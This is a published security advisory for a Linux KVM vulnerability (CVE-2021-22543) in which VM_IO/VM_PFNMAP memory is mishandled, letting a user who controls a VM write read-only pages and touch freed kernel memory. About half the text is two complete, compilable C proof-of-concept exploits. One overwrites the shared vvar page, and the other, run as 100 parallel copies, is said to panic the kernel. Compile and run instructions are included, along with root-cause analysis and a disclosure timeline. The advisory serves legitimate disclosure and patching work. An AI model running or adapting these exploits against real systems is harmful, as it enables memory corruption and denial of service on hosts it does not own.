Linux: KVM VM_IO|VM_PFNMAP vma mishandling

   moderate
   sirdarckcat published GHSA-7wq5-phmq-m584 May 18, 2021

Package

   Linux Kernel

Affected versions

   add6a0cd1c5ba51b201e1361b05a5df817083618

Patched versions

   n/a

Description

  Summary

   Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and
   can lead to pages being freed while still accessible by the VMM and guest.

  Severity

   Moderate - On some systems, allows users with the ability to start and
   control a VM to read/write random pages of memory.

  Proof of Concept

   vvar_write.c
   Compile the code below using gcc -o vvar_write vvar_write.c. Running the
   code once will show that the vvar page is modified, and running it a
   second time will show the modification affects other processes.

 /* @author Jann Horn
  * at https://elixir.bootlin.com/linux/v5.10.11/source/arch/x86/entry/vdso/vma.c#L297 we map the
  * VVAR page of the VDSO, which contains a struct vdso_data
  * (https://elixir.bootlin.com/linux/v5.10.11/source/include/vdso/datapage.h#L90) that contains
  * information about clock offsets and such (to allow ring 3 to figure out the current time using
  * RDTSC without switching to kernel mode). this page is shared across the entire system so that if
  * the clock offset changes, it only has to be changed in one central location. the VVAR page is
  * marked VM_IO so that the get_user_pages machinery keeps its paws off that page. but KVM's
  * hva_to_pfn() is AFAICS going to first try get_user_pages, that will fail, then it notices that
  * the VMA is VM_IO, goes down the hva_to_pfn_remapped path, and then I think that thing just grabs
  * the PFN with follow_pfn and forces the writable flag to true even though the PFN is read-only...
 */
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <string.h>
 #include <err.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <linux/kvm.h>

 /* for real mode */
 static __attribute__((aligned(4096))) char guest_code[0x1000] = {
   0x89, 0x35, /* mov [di],si */
   0xcc, /* int3 */
 };

 static void create_region(int vm, int slot, unsigned long guest_phys, unsigned long host_addr, unsigned long size) {
   struct kvm_userspace_memory_region region = {
     .slot = slot,
     .guest_phys_addr = guest_phys,
     .memory_size = size,
     .userspace_addr = host_addr
   };
   if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region))
     err(1, "set region %d", slot);
 }

 int main(void) {
   FILE *mapsfile = fopen("/proc/self/maps", "r");
   if (mapsfile == NULL)
     err(1, "open maps");
   unsigned long vvar_addr;
   while (1) {
     char buf[4096];
     errno = 0;
     if (fgets(buf, sizeof(buf), mapsfile) == NULL)
       err(1, "fgets maps EOF or error");
     if (strstr(buf, "[vvar]") == NULL)
       continue;
     vvar_addr = strtoul(buf, NULL, 16);
     break;
   }
   printf("vvar is at 0x%lx\n", vvar_addr);
   printf("testing read of first vvar page at offset 0xf00: 0x%lx\n", *(unsigned long *)(vvar_addr + 0xf00));

   int kvm = open("/dev/kvm", O_RDWR);
   if (kvm == -1)
     err(1, "open kvm");
   int mmap_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
   if (mmap_size == -1)
     err(1, "KVM_GET_VCPU_MMAP_SIZE");

   int vm = ioctl(kvm, KVM_CREATE_VM, 0);
   if (vm == -1)
     err(1, "create vm");
   if (ioctl(vm, KVM_SET_TSS_ADDR, 0x10000000UL))
     err(1, "KVM_SET_TSS_ADDR");
   create_region(vm, 0, 0x0, (unsigned long)guest_code, 0x1000);
   create_region(vm, 1, 0x1000, vvar_addr, 0x1000);

   int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
   if (vcpu == -1)
     err(1, "create vcpu");
   struct kvm_run *vcpu_state = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpu, 0);
   if (vcpu_state == MAP_FAILED)
     err(1, "mmap vcpu");

   struct kvm_sregs sregs;
   if (ioctl(vcpu, KVM_GET_SREGS, &sregs))
     err(1, "KVM_GET_SREGS");
   sregs.cs.selector = 0;
   sregs.cs.base = 0;
   struct kvm_regs regs = {
     .rdi = 0x1f00,
     .rsi = 0xf00d,
     .rip = 0x0,
     .rflags = 2
   };
   if (ioctl(vcpu, KVM_SET_SREGS, &sregs))
     err(1, "set sregs");
   if (ioctl(vcpu, KVM_SET_REGS, &regs))
     err(1, "set regs");

   if (ioctl(vcpu, KVM_RUN, 0))
     err(1, "run vcpu");
   printf("exit_reason = %d\n", vcpu_state->exit_reason);
   if (vcpu_state->exit_reason == KVM_EXIT_FAIL_ENTRY) {
     printf("KVM_EXIT_FAIL_ENTRY happened: hardware_entry_failure_reason = 0x%lx\n",
            (unsigned long)vcpu_state->fail_entry.hardware_entry_failure_reason);
   }

   printf("testing read of first vvar page at offset 0xf00: 0x%lx\n", *(unsigned long *)(vvar_addr + 0xf00));
 }

   kernel_write.c
   Compile the code below using gcc -o kernel_write kernel_write.c. What
   exactly happens when running the code depends on what the improperly freed
   page is reallocated for. Running 100 instances in parallel should reliably
   cause a kernel panic within a few seconds.

 /* @author Jann Horn */
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <string.h>
 #include <err.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <linux/kvm.h>

 /* for real mode */
 static __attribute__((aligned(4096))) char guest_code[0x1000] = {
   0x89, 0x35, /* mov [di],si */
   0xcc, /* int3 */
 };

 static void create_region(int vm, int slot, unsigned long guest_phys, unsigned long host_addr, unsigned long size) {
   struct kvm_userspace_memory_region region = {
     .slot = slot,
     .guest_phys_addr = guest_phys,
     .memory_size = size,
     .userspace_addr = host_addr
   };
   if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region))
     err(1, "set region %d size=0x%lx", slot, size);
 }

 int main(void) {
   sync(); /* in case we're about to panic the kernel... */

   char *usb_path = "/dev/bus/usb/001/001";
   int usb_fd = open(usb_path, O_RDONLY);
   if (usb_fd == -1)
     err(1, "open '%s'", usb_path);
   char *usb_mapping = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, usb_fd, 0);
   if (usb_mapping == MAP_FAILED)
     err(1, "mmap 2 pages from usb device");

   int kvm = open("/dev/kvm", O_RDWR);
   if (kvm == -1)
     err(1, "open kvm");
   int mmap_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
   if (mmap_size == -1)
     err(1, "KVM_GET_VCPU_MMAP_SIZE");

   int vm = ioctl(kvm, KVM_CREATE_VM, 0);
   if (vm == -1)
     err(1, "create vm");
   if (ioctl(vm, KVM_SET_TSS_ADDR, 0x10000000UL))
     err(1, "KVM_SET_TSS_ADDR");
   create_region(vm, 0, 0x0, (unsigned long)guest_code, 0x1000);

   int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
   if (vcpu == -1)
     err(1, "create vcpu");
   struct kvm_run *vcpu_state = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpu, 0);
   if (vcpu_state == MAP_FAILED)
     err(1, "mmap vcpu");

   while (1) {
     create_region(vm, 1, 0x1000, (unsigned long)usb_mapping+0x1000, 0x1000);
     struct kvm_sregs sregs;
     if (ioctl(vcpu, KVM_GET_SREGS, &sregs))
       err(1, "KVM_GET_SREGS");
     sregs.cs.selector = 0;
     sregs.cs.base = 0;
     struct kvm_regs regs = {
       .rdi = 0x1f00,
       .rsi = 0xf00d,
       .rip = 0x0,
       .rflags = 2
     };
     if (ioctl(vcpu, KVM_SET_SREGS, &sregs))
       err(1, "set sregs");
     if (ioctl(vcpu, KVM_SET_REGS, &regs))
       err(1, "set regs");

     if (ioctl(vcpu, KVM_RUN, 0))
       err(1, "run vcpu");
     printf("exit_reason = %d\n", vcpu_state->exit_reason);
     if (vcpu_state->exit_reason == KVM_EXIT_FAIL_ENTRY) {
       printf("KVM_EXIT_FAIL_ENTRY happened: hardware_entry_failure_reason = 0x%lx\n",
              (unsigned long)vcpu_state->fail_entry.hardware_entry_failure_reason);
     }
     create_region(vm, 1, 0, 0, 0);
   }
 }

  Further Analysis

   The issue is in how KVM handles mapping certain types of host memory into
   the guest. Most of the time, KVM uses get_user_pages to translate the host
   virtual address to the page it needs to map into the guest. However,
   get_user_pages will fail if the address lies in a vma with the VM_IO or
   VM_PFNMAP flag set (checked in check_vma_flags [1]). KVM handles that
   failure by using follow_pfn to fetch the page directly from the vma [2].
   If those pages do not have the PG_reserved bit set, KVM proceeds to treat
   them as normal pages [3], and will call getpage/putpage on them. However,
   reference counting on the pages might not be set up to handle this - for
   example, tail pages of the higher order pages allocated in
   ttm_pool_alloc_page [4]. Such pages can end up being freed by the call to
   putpage at the end of the guest page fault, even though the guest and host
   still reference the page.

   [1]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/mm/gup.c#L886
   [2]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/virt/kvm/kvm_main.c#L1981
   [3]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/virt/kvm/kvm_main.c#L174
   [4]
   https://github.com/torvalds/linux/blob/f78d76e72a4671ea52d12752d92077788b4f5d50/drivers/gpu/drm/ttm/ttm_pool.c#L83

  Timeline

   Date reported: 2021-02-01 to kernel.org
   Date fixed: RO bypass fixed on 2021-02-04. Improper freeing of pages not
   yet fixed.
   Date disclosed: 2021-05-18

CVE ID

   CVE-2021-22543

    Credits

     * @dgstevens dgstevens
     * @thejh thejh Jann
     * @fluxchief fluxchief Kevin Hamacher